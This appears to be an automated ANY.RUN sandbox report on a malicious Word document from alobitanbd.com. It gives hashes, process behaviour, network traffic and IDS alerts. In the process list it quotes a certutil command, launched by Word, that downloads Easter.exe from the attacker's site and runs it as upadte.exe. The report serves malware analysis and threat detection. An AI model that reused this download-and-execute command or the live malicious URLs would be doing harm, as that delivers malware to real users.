analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://alobitanbd.com/css/Giveaway.doc

Full analysis: https://app.any.run/tasks/e8b22ea0-2535-4792-89c4-d7ffbfcaf19a
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 25, 2019, 10:45:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
Indicators:
MD5:

733E737F2F381A6029D77EE4865B6C15

SHA1:

CD3093BCE99ECBEA62EA6D231B54EE3F9DE8845C

SHA256:

0CF2227986C0EDA34AECF817578046CD5E97D78B9E773D6FE04C01EDA755364D

SSDEEP:

3:N1KfuQEzUUWKa1KGn:C2QEyAGn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CertUtil for downloading files

      • WINWORD.EXE (PID: 1912)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1912)

    • Downloads executable files from the Internet

      • certutil.exe (PID: 2496)

    • Application was dropped or rewritten from another process

      • upadte.exe (PID: 2132)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • WINWORD.EXE (PID: 1912)

    • Application launched itself

      • WINWORD.EXE (PID: 1912)

    • Reads Internet Cache Settings

      • WINWORD.EXE (PID: 1912)

    • Executable content was dropped or overwritten

      • certutil.exe (PID: 2496)

  • INFO

    • Creates files in the user directory

      • iexplore.exe (PID: 3904)
      • WINWORD.EXE (PID: 1912)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3904)
      • iexplore.exe (PID: 2140)

    • Changes internet zones settings

      • iexplore.exe (PID: 2140)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1912)
      • WINWORD.EXE (PID: 948)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start iexplore.exe iexplore.exe winword.exe winword.exe no specs certutil.exe upadte.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2140"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3904"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2140 CREDAT:71937C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
1912"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2496"C:\Windows\System32\certutil.exe" -urlcache -split -f http://alobitanbd.com/css/Easter.exe C:\Users\admin\AppData\Local\Temp\upadte.exeC:\Windows\System32\certutil.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2132C:\Users\admin\AppData\Local\Temp\upadte.exeC:\Users\admin\AppData\Local\Temp\upadte.exeWINWORD.EXE
User:
admin
Company:
HappyOrNot
Integrity Level:
MEDIUM
Description:
K&R Transporte
Version:
5.6.14.17
Total events
1 882
Read events
1 442
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
31
Text files
15
Unknown types
6

Dropped files

PID
Process
Filename
Type
2140iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico
MD5:
SHA256:
2140iexplore.exeC:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
MD5:
SHA256:
1912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR42E2.tmp.cvr
MD5:
SHA256:
1912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{03191C4B-1927-48D6-8B0B-943B8452FD12}
MD5:
SHA256:
1912WINWORD.EXEC:\Users\admin\AppData\Local\Temp\{162CB2C6-D49C-4EAC-A354-6B463213041A}
MD5:
SHA256:
3904iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.datdat
MD5:D71AC395480DAAB525D30BE3DDF9286B
SHA256:7AFD4C74DFF52921C1A19FFEA8B1A8D8B94D9E27E7EBE470D7699473A5D4EC8C
1912WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:CE899C5FF6BE165866AD16922482E9F6
SHA256:C63E2FA8463E8E0E2C65103721E9B507A407B77F556AA3348F69002B60778E63
3904iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.datdat
MD5:1D97DF963A7F5204D431F3DCC67EBE03
SHA256:B3B66BB5A902D71D0DACD4B2CBE62A1C5A661E832423E98E46E856D01274D50A
1912WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{F1727E45-0C8B-4132-ABD5-DB2CFAC87973}.FSDbinary
MD5:8F8B1C840F0C765F6794E1F826EFAC2F
SHA256:B3104D8D532BEE12A013E995DEDF7A760044C24D1BC558E1E29C3BAB5C9EDD67
3904iexplore.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\C695FPVW\desktop.iniini
MD5:4A3DEB274BB5F0212C2419D3D8D08612
SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
8
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3904
iexplore.exe
GET
200
192.185.77.10:80
http://alobitanbd.com/css/Giveaway.doc
US
document
18.8 Kb
suspicious
1912
WINWORD.EXE
OPTIONS
200
192.185.77.10:80
http://alobitanbd.com/css/
US
suspicious
1912
WINWORD.EXE
HEAD
200
192.185.77.10:80
http://alobitanbd.com/css/Giveaway.doc
US
suspicious
1912
WINWORD.EXE
HEAD
200
192.185.77.10:80
http://alobitanbd.com/css/Giveaway.doc
US
suspicious
2496
certutil.exe
GET
200
192.185.77.10:80
http://alobitanbd.com/css/Easter.exe
US
executable
746 Kb
suspicious
2496
certutil.exe
GET
200
192.185.77.10:80
http://alobitanbd.com/css/Easter.exe
US
executable
746 Kb
suspicious
1912
WINWORD.EXE
GET
200
192.185.77.10:80
http://alobitanbd.com/css/Giveaway.doc
US
document
18.8 Kb
suspicious
1912
WINWORD.EXE
HEAD
200
192.185.77.10:80
http://alobitanbd.com/css/Giveaway.doc
US
compressed
18.8 Kb
suspicious
2140
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2140
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
1912
WINWORD.EXE
192.185.77.10:80
alobitanbd.com
CyrusOne LLC
US
suspicious
3904
iexplore.exe
192.185.77.10:80
alobitanbd.com
CyrusOne LLC
US
suspicious
2496
certutil.exe
192.185.77.10:80
alobitanbd.com
CyrusOne LLC
US
suspicious
984
svchost.exe
192.185.77.10:80
alobitanbd.com
CyrusOne LLC
US
suspicious

DNS requests

Domain
IP
Reputation
alobitanbd.com
  • 192.185.77.10
suspicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted

Threats

PID
Process
Class
Message
1912
WINWORD.EXE
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2496
certutil.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2496
certutil.exe
Misc activity
SUSPICIOUS [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
2496
certutil.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2496
certutil.exe
Generic Protocol Command Decode
SURICATA STREAM excessive retransmissions
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
http://alobitanbd.com/css/Giveaway.doc